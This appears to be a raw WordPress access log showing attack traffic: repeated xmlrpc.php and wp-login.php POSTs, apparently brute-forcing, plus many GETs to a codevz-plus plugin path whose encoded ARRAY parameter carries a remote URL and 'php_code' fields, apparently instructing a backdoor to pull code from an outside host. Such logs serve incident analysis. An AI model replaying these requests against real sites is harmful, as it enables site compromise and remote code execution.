23.137.105.214 - - [21/Apr/2026:20:19:08 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:19:12 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:19:16 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:19:20 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:19:26 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:19:31 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:19:37 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:19:47 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:19:52 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:20:03 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:20:08 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:20:18 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:20:24 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:20:32 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:20:37 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:20:46 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:18:55 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363333352p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323733352q6432323333373635383663343635316366343861653932396361373936613633222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
23.137.105.214 - - [21/Apr/2026:20:20:51 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:21:03 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:21:08 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:19:16 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363335362p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323735362q3965666266636631663064363333333364323436313531363462346364343266222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
23.137.105.214 - - [21/Apr/2026:20:21:16 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:21:21 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:21:32 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:19:37 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363337372p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323737372q3464336664383865383265613138343637346464393233333261623261333163222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
23.137.105.214 - - [21/Apr/2026:20:21:37 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:21:46 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:19:58 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363339382p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323739382q3839363865633634646363366266613866646135616635643866343361646434222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
23.137.105.214 - - [21/Apr/2026:20:21:51 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:22:01 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:16:06 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363136362p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323536362q3365333533396135326433313733373938363731376164653264363263356233222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:16:27 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363138372p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323538372q3633633866613566363638393166363739616137343533626461376238386631222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:17:10 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363233302p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323633302q3937393537663762343734643663366336343264356638326233313037653434222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:17:52 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363237322p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323637322q3730336537346538633033336535663738666635656332343735343362396131222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:18:13 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363239332p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323639332q3039653438383331346239393466353036346461383863653834313631653636222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.197.165.12 - - [21/Apr/2026:20:22:35 +0000] "POST /wp-login.php HTTP/1.1" 200 11157 "-" "Mozilla/5.0"
23.137.105.214 - - [21/Apr/2026:20:22:07 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:20:19 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363431392p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323831392q3962623938663634616333353736346530653563356565626166323034666135222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
23.137.105.214 - - [21/Apr/2026:20:22:16 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:22:22 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:22:31 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:22:36 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:22:46 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:22:51 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:23:02 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:23:07 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:23:16 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:21:24 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363438342p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323838342q6565346432386437633334393932303738643735346333383262636237653139222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
23.137.105.214 - - [21/Apr/2026:20:23:21 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:23:31 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:23:36 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:23:46 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:23:51 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:24:01 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
54.38.147.214 - - [21/Apr/2026:20:24:08 +0000] "GET /author/gaber/page/7/ HTTP/2" 404 22795 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
23.137.105.214 - - [21/Apr/2026:20:24:06 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:24:16 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:24:22 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
66.249.73.96 - - [21/Apr/2026:20:24:33 +0000] "GET /?p=87234680282528 HTTP/1.1" 200 27214 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
23.137.105.214 - - [21/Apr/2026:20:24:31 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:24:36 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:22:48 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363536382p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323936382q3464323739316463343135346235653065656232396361333739623561373037222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
23.137.105.214 - - [21/Apr/2026:20:24:46 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:24:51 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:25:02 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:25:07 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
23.137.105.214 - - [21/Apr/2026:20:25:17 +0000] "POST //xmlrpc.php HTTP/1.1" 200 441 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
138.201.22.4 - - [21/Apr/2026:20:15:22 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363132322p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323532322q6134326139303565353438663530383539356662383131396166353366303439222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:17:31 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363235312p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323635312q3338356638663664383636343435313165326238313031353761393437333536222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:18:34 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363331342p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323731342q3963353230303163656235326631376438373235356164663566363935376237222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:23:09 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363538392p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830323938392q3235383064613165366432363539396238383565663964373863666134363931222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:23:51 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363633312p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830333033312q3734393032346137366461393064356365366630353033663363316664343861222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
138.201.22.4 - - [21/Apr/2026:20:23:30 +0000] "GET /wp-content/plugins/codevz-plus/admin/fields/textarea/textarea/index.php?ARRAY=7o2230223n313737363830363631302p2231223n22687474703n5p2s5p2s68776236337630372r7374657069632r62757n7n5p2s3s6p633q7068705s636s64655s6n6326743q313737363830333031302q3630386538313534663764346538313231383761353133656262346634616336222p2232223n223631653831643162383964373266633564396265656262393865653737323538222p2233223n223530366135366366633361623064313165366566393530373331636437656263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34342q36302q36372q37332q38332q3233227q HTTP/1.1" 500 384 "-" "-"
